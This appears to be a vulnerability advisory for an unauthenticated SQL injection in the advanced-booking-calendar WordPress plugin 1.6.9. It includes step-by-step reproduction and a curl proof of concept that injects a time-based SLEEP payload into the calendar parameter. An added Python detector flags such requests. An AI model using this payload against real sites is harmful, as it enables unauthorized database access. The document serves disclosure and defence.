The plugin does not validate or escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection.
1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9)
2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode)
3. Create a new page with the shortcode you receive when you finish creating a calendar
4. Visit the just created page and extract the nonce (search for abc_nonce in the source)
5. Invoke the following command to induce a 5 second sleep

    curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)'

Note:
+ "abc_nonce" is the required nonce
+ "uniqid" can be a random string
+ "month" should be provided and be a valid int (a month in a year)
+ "calendar" is the injection point
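As an added example, not part of the original report: a small check a defender can run over captured admin-ajax.php POST bodies (WAF audit logs or a request capture; plain access logs omit POST bodies), flagging calls to this action whose calendar or month value is not a plain integer. The sample bodies are constructed; the nonce and uniqid values are the report's own placeholders.

```python
# Added detection logic (not the plugin's or the report's own code): flags
# admin-ajax.php POST bodies that target abc_booking_getSingleCalendar with a
# non-integer calendar/month value, which is exactly what the PoC above sends.
import re
from typing import Dict, List
from urllib.parse import parse_qs

ACTION = "abc_booking_getSingleCalendar"
INT_RE = re.compile(r"^\d+$")
# Coarse SQL syntax signature, only consulted for the two numeric parameters.
SQL_RE = re.compile(r"\b(select|sleep|union|benchmark|or|and)\b|--|/\*|'", re.I)


def parse_body(body: str) -> Dict[str, str]:
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def check_request(body: str) -> List[str]:
    """Return the reasons a request is suspicious; an empty list means clean.

    Only requests for the vulnerable AJAX action are inspected. A legitimate
    call sends a calendar id and a month, both plain integers; anything else in
    those fields is either broken or an injection attempt.
    """
    params = parse_body(body)
    if params.get("action") != ACTION:
        return []
    reasons = []
    for name in ("calendar", "month"):
        value = params.get(name, "")
        if not INT_RE.fullmatch(value):
            reasons.append(f"{name} is not an integer: {value!r}")
        if SQL_RE.search(value):
            reasons.append(f"{name} carries SQL syntax: {value!r}")
    month = params.get("month", "")
    if INT_RE.fullmatch(month) and not 1 <= int(month) <= 12:
        reasons.append(f"month out of range: {month}")
    return reasons


# Constructed sample bodies. POC_BODY is the payload from the report above;
# the nonce and uniqid values are the report's own placeholders.
POC_BODY = ("action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19"
            "&uniqid=620ff6dacd7f8&month=3"
            "&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)")
BENIGN_BODY = ("action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19"
               "&uniqid=620ff6dacd7f8&month=3&calendar=12")
OTHER_ACTION = "action=heartbeat&calendar=(SELECT 1)"

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY), ("other", OTHER_ACTION)):
        print(label, check_request(body) or "clean")
```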
cydave
2022-02-28 (about 1 years ago)
2022-04-16 (about 1 years ago)